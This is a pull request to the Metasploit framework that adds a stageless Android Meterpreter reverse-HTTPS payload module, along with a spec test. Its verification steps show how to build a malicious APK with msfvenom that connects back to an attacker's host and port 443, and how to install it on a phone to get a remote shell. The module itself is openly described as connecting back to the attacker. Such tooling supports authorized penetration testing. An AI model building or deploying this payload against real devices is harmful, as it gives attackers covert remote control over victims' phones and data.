### PR TITLE
Android Stageless Meterpreter over HTTPS

### DIFF
--- a/modules/payloads/singles/android/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_https.rb
@@ -35,9 +35,6 @@ module MetasploitModule
       'Session'     => Msf::Sessions::Meterpreter_Java_Android,
       'Payload'     => '',
       ))
-    register_options([
-      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
-    ], self.class)
   end
 
   #

--- a/modules/payloads/singles/android/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_https.rb
@@ -1,0 +1,57 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/android'
+require 'msf/core/payload/uuid/options'
+require 'msf/base/sessions/meterpreter_android'
+require 'msf/base/sessions/meterpreter_options'
+require 'rex/payloads/meterpreter/config'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Single
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+
+  def initialize(info = {})
+
+    super(merge_info(info,
+      'Name'        => 'Android Meterpreter Shell, Reverse HTTPS Inline',
+      'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttps,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android,
+      'Payload'     => '',
+      ))
+    register_options([
+      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
+    ], self.class)
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_https(opts)
+  end
+
+  def generate_jar(opts={})
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    opts[:uri] = generate_uri_uuid_mode(:connect, uri_req_len)
+    opts[:stageless] = true
+    super(opts)
+  end
+
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -45,6 +45,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'aix/ppc/shell_reverse_tcp'
   end
 
+  context 'android/meterpreter_reverse_https' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/android/meterpreter_reverse_https'
+                          ],
+                          dynamic_size: true,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'android/meterpreter_reverse_https'
+  end
+
   context 'android/meterpreter_reverse_http' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
Change to add functionality for stateless meterpreter over HTTPS.


Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

generate ask with msfvenom  - 
msfvenom -p android/meterpreter_reverse_https LHOST=<IP> LPORT=443 > out.apk
Install the apk and set android/meterpreter_reverse_https as the multi/handler payload
start handler
install the apk to phone or in emulator
run the apk
